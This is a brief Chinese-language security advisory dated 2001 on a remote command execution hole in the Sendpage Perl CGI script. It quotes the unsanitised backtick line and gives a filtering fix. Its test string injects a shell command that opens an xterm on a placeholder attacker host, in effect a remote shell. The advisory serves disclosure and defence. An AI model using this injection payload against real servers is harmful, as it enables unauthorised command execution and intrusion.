Sendpage (Perl CGI) 存在远程命令可执行漏洞发布时间:2001-11-28 更新时间:2001-11-28 严重程度:高 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:物理接触 受影响系统 http://honor.sprawl.com/Software/Sendpage/详细描述 Sendpage.pl 没有很好的检查和过滤用户输入,可以导致远程用户执行任意命令。 问题存在于脚本的68行:68: { $ret=`/bin/echo \"$message\" | $pcmd`; } 测试代码 可以使用如下命令开出一个SHELL: test"; sh -c 'xterm -display ATACKER_IP:0.0 &'; echo "message 解决方案 过滤,';"/`\%$#{}-&<>... 等字符: $message =~ s/[^\w\s]//g; 相关信息 Pedram Amini pedram@redhive.com |
